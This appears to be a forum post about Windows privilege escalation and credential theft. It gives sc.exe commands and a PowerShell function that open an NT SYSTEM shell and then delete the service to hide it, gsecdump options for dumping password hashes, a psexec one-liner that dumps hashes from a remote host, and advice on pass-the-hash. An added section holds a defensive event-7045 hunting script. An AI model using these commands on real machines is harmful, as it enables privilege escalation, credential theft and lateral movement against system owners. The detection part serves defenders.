To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

(The 1053 is expected: cmd.exe never registers with the Service Control Manager, so the start request times out, but by then "start" has already opened the new window on the interactive desktop. Delete the service afterwards so no entry is left behind.)

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
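The same procedure as a script, as an added example that is not part of the original post or of the truesec article it quotes. It wraps the sc.exe calls above in a function that first checks the NoInteractiveServices setting (from Vista on, session 0 isolation keeps service windows off the user's desktop, and on Windows 8 and later the value is 1 by default), treats the expected 1053 timeout as success and always deletes the service entry again. The function name, the registry check and the defaults are our own assumptions; it needs PowerShell 2.0 or later and an elevated console.

```powershell
# Added example, not code from the original post. Generalises the sc.exe trick above:
# create a one-shot service that runs an arbitrary command as LocalSystem on the
# interactive desktop, start it, and clean up the service entry afterwards.
function Start-InteractiveSystemShell {
    param(
        [string]$ServiceName = 'shellcmdline',
        # 'start' spawns a detached console, so the new window survives once the
        # Service Control Manager (SCM) gives up on the cmd.exe it launched.
        [string]$Command = 'C:\WINDOWS\system32\cmd.exe /K start'
    )

    # Vista and later run services in session 0. With NoInteractiveServices=1 the
    # window can never reach a user desktop, so bail out before creating anything.
    # With the value at 0 on Vista/7 the window lands in session 0 and is only reachable
    # through the Interactive Services Detection prompt.
    $reg = 'HKLM:\SYSTEM\CurrentControlSet\Control\Windows'
    $nis = (Get-ItemProperty -Path $reg -Name NoInteractiveServices -ErrorAction SilentlyContinue).NoInteractiveServices
    if ($nis -eq 1) {
        throw 'Interactive services are disabled on this host (NoInteractiveServices=1).'
    }

    # sc.exe requires the space after each '='; passing type= twice is the documented
    # way to ask for both own-process and interactive.
    $out = & sc.exe create $ServiceName binpath= $Command type= own type= interact
    if ($LASTEXITCODE -ne 0) { throw "CreateService failed ($LASTEXITCODE): $out" }

    try {
        # sc.exe returns the Win32 error code as its exit code. cmd.exe never calls
        # StartServiceCtrlDispatcher, so the SCM reports 1053 after its timeout; by then
        # 'start' has already opened the SYSTEM console, so 1053 is the expected outcome.
        $out = & sc.exe start $ServiceName
        if ($LASTEXITCODE -eq 1053) {
            Write-Host 'SCM timed out (1053) as expected; look for the new window on the console desktop.'
        } elseif ($LASTEXITCODE -ne 0) {
            throw "StartService failed ($LASTEXITCODE): $out"
        }
    } finally {
        # Always remove the service entry so no persistence (and no stale 7045 trail) is left.
        & sc.exe delete $ServiceName | Out-Null
    }
}

Start-InteractiveSystemShell
```

Run it from an elevated console; the whoami check above is the way to confirm the new window really is NT AUTHORITY\SYSTEM.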
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from the active logon sessions of a remote system (-s runs gsecdump as SYSTEM on the remote host, -c copies the executable there first and -f overwrites an earlier copy).
These are a lot better than a cachedump of the cached credentials, because these are LM hashes that can be broken easily with rainbow tables.
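On the defender's side, as an added example that is not part of the original post: both steps above leave the same trace. The sc create on the local box, and the PSEXESVC service that psexec installs on the remote host when it runs with -s/-c, each produce event 7045 ("A service was installed in the system") in the System log with the service name, image path, start type and account. This hunts the most recent 7045 events for an image path that is a shell or script host (the shellcmdline entry above is "C:\WINDOWS\system32\cmd.exe /K start") or that is PSEXESVC. The function name, the list of suspicious images and the event cutoff are our own assumptions; it needs PowerShell 3.0 or later and read access to the System log.

```powershell
# Added example, not code from the original post: hunt event 7045 (service installed)
# for the kind of entries the sc.exe and psexec steps above create.
function Find-SuspiciousServiceInstall {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$MaxEvents = 1000
    )
    # Images that have no business being a service binary (assumed list, extend as needed).
    $shells = 'cmd.exe', 'powershell.exe', 'cscript.exe', 'wscript.exe', 'rundll32.exe', 'regsvr32.exe'

    Get-WinEvent -ComputerName $ComputerName -MaxEvents $MaxEvents -ErrorAction Stop `
        -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045 } |
    ForEach-Object {
        # EventData order for 7045: ServiceName, ImagePath, ServiceType, StartType, AccountName
        $p = $_.Properties
        [pscustomobject]@{
            Time        = $_.TimeCreated
            ServiceName = $p[0].Value
            ImagePath   = $p[1].Value
            StartType   = $p[3].Value
            Account     = $p[4].Value
        }
    } |
    Where-Object {
        $img = $_.ImagePath
        # A shell or script host as the service image, e.g. "...\cmd.exe /K start" above.
        # The pattern requires a path separator before the name and whitespace or end after it,
        # so "cmd.exe" inside a longer, legitimate file name does not match.
        $isShell = @($shells | Where-Object { $img -match ('\\' + [regex]::Escape($_) + '(\s|$)') }).Count -gt 0
        # PSEXESVC is the service psexec drops on the remote host (flag unless psexec is sanctioned there).
        $isPsexec = $img -match 'PSEXESVC'
        $isShell -or $isPsexec
    }
}

# Review the service installs on the local host, newest first.
Find-SuspiciousServiceInstall | Sort-Object Time -Descending | Format-Table -AutoSize
```

Because the post deletes the service right after use, the 7045 event is usually the only artefact that survives; the delete itself is not logged by the SCM, so a 7045 for a service that no longer exists is itself a good signal.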

A tip: you can use iam from the pshtools kit to inject the hashes just dumped with gsecdump into the local lsass process, i.e. a pass-the-hash attack. Those foreign guys really are good; the admins will have their hands full now. The LM/NT hashes captured during ARP spoofing, or obtained with gethash, do not need to be cracked at all; it is just a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash you are 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to date from /2007/03/16/. Depressing, what a gap.
